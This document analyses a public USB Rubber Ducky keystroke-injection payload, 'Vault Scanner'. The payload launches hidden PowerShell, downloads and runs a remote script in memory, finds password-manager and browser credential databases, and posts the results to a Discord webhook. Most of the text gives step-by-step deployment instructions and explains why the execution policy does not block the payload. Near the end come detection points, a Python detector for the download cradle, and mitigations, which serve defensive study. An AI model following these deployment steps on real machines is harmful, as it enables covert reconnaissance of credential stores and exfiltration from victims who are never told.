Vault Scanner – USB Rubber Ducky Payload Analysis

This document describes Vault Scanner, a keystroke injection payload for the USB Rubber Ducky. It automates the discovery of password manager database files on Windows systems and exfiltrates the findings to a Discord webhook. The payload is publicly available in the ex-cal1bur/usbrubberducky-payloads repository.

The attack requires physical access to the target machine. Once inserted, the Rubber Ducky enumerates as a Human Interface Device (HID), typically a keyboard. The operating system executes the injected keystrokes at high speed without user interaction.

Execution Flow

The Rubber Ducky runs a DuckyScript stored as inject.bin. The script performs the following steps:

  1. Opens the Windows Run dialog with GUI r.
  2. Launches PowerShell with the -WindowStyle Hidden parameter.
  3. Executes Invoke-Expression (Invoke-RestMethod '<URL>').

The <URL> points to a remote PowerShell script named Vault_Scanner.ps1. The script is downloaded and executed in memory without writing to disk. This evasion technique reduces forensic artifacts and bypasses simple file-based detection.

Script Capabilities

Vault_Scanner.ps1 scans for database files belonging to more than ten password managers. The detection list includes:

  • KeePass (.kdbx)
  • Bitwarden (.json, .sqlite)
  • 1Password (.1pif, .sqlite)
  • LastPass (local cache files)
  • Dashlane (.db, .sqlite)
  • Enpass (.db, .sqlite)
  • NordPass (.db)
  • Keeper (.dat)
  • Firefox Lockwise (logins.json)
  • Chrome and Edge (Login Data SQLite databases)

The script searches standard user profile locations:

  • %APPDATA%
  • %LOCALAPPDATA%
  • %USERPROFILE%\Documents
  • %USERPROFILE%\Desktop

For each matching file, the script extracts: manager name, file name, full path, file size (bytes), and last write time (UTC).

Exfiltration via Discord Webhook

The script contains a hardcoded string WEBHOOK_URL_PLACEHOLDER. The operator replaces this with a valid Discord webhook URL before hosting the script. The collected findings are formatted into text blocks and sent as HTTP POST requests to discord.com/api/webhooks/<id>/<token>.

The script splits the output into chunks of 1,800 characters to respect Discord’s message length limit. Each chunk is sent as a separate message. No authentication other than the webhook token is required.

Configuration Steps

To deploy the payload:

  1. Edit Vault_Scanner.ps1 and replace WEBHOOK_URL_PLACEHOLDER with a working Discord webhook URL.
  2. Host the modified script on a web server accessible from the target machine (HTTP or HTTPS).
  3. Edit payload.txt and change example.com to the server’s domain or IP address.
  4. Compile payload.txt to inject.bin using PayloadStudio or the Java-based duckencoder.
  5. Copy inject.bin to the Rubber Ducky’s microSD card (usually named DUCKY).

When the device is inserted, the payload executes without additional prompts. Windows 10 and 11 are supported. The default PowerShell execution policy (Restricted) does not block this: execution policy governs script files, and the Invoke-Expression (Invoke-RestMethod ...) command is typed as a single command line, so no script file is ever run and no unrestricted policy is needed.

Defensive Limitations

Keystroke injection attacks bypass most antivirus and EDR products because no binary, script file, or unusual process behavior appears initially. The PowerShell process is legitimate; the malicious activity occurs as commands typed by a "user."

Detection opportunities arise at two points:

  • Network traffic to discord.com/api/webhooks from a non-browser process.
  • Process creation of powershell.exe with the arguments -WindowStyle Hidden and Invoke-Expression (Invoke-RestMethod...).
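As an added example (not code from the repository or the original write-up), the following Python applies the second detection opportunity to constructed 4688-style process-creation records. The field names, the sample command lines and the handling of the -w / iex / irm short forms are assumptions for the illustration.

```python
import re

# Constructed records in the shape of Windows Security event 4688 (process
# creation) with command-line auditing enabled; sample data, not real telemetry.
SAMPLE_EVENTS: list[dict[str, str]] = [
    {   # the page's payload as typed through the Run dialog (explorer.exe parent)
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentProcessName": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -WindowStyle Hidden Invoke-Expression "
                       "(Invoke-RestMethod 'http://example.com/Vault_Scanner.ps1')",
    },
    {   # same cradle written with the documented short aliases (-w, iex, irm)
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentProcessName": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -w hidden iex (irm 'http://example.com/vs.ps1')",
    },
    {   # benign: scheduled maintenance script, hidden window but no cradle
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentProcessName": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell -WindowStyle Hidden -File C:\ProgramData\maint.ps1",
    },
]

POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
# powershell.exe accepts abbreviated parameter names (-w is documented shorthand
# for -WindowStyle), so matching only the full spelling would miss real launches.
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden\b", re.I)
# Invoke-Expression over an Invoke-RestMethod result: the page's in-memory
# download cradle, with the iex / irm aliases covered as well.
IEX_IRM_CRADLE = re.compile(
    r"(?:invoke-expression|\biex)\b\s*\(\s*(?:invoke-restmethod|\birm)\b", re.I)

def analyze(event: dict[str, str]) -> dict[str, object]:
    """Score one 4688 record as {'alert': bool, 'reasons': [...]}; a hidden
    window alone is not alerted (scheduled tasks use it routinely)."""
    reasons: list[str] = []
    if not POWERSHELL.search(event.get("NewProcessName", "")):
        return {"alert": False, "reasons": reasons}
    cmd = event.get("CommandLine", "")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    if IEX_IRM_CRADLE.search(cmd):
        reasons.append("iex(irm) download cradle")
    if event.get("ParentProcessName", "").lower().endswith("\\explorer.exe"):
        reasons.append("launched from the interactive shell (Run dialog)")
    return {"alert": "iex(irm) download cradle" in reasons, "reasons": reasons}

def detect(events: list[dict[str, str]]) -> list[int]:
    """Indices of records that should raise an alert."""
    return [i for i, e in enumerate(events) if analyze(e)["alert"]]
```

The same matching can be applied to Sysmon event 1 or EDR telemetry; only the field names differ.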

Administrators can mitigate by:

  • Applying application whitelisting to restrict which executables can run from user-writable locations.
  • Using PowerShell Constrained Language Mode or Device Guard.
  • Blocking outbound HTTPS traffic to known webhook domains unless explicitly required.
  • Monitoring for Run dialog activity followed by PowerShell commands (Windows Security event ID 4688, process creation; the command line is only recorded if command-line auditing is enabled).

Repository References

The source code is available at:
https://github.com/ex-cal1bur/usbrubberducky-payloads/tree/master/payloads/library/recon/Vault_Scanner

The payload.txt and Vault_Scanner.ps1 files are included. No compilation is required for the PowerShell script, but the DuckyScript must be encoded to binary format for the Rubber Ducky.

Legal Notice

The repository includes a warning that the payload is intended for authorized penetration testing and educational purposes. Unauthorized deployment constitutes illegal access under computer misuse laws. Operators must obtain written permission before use.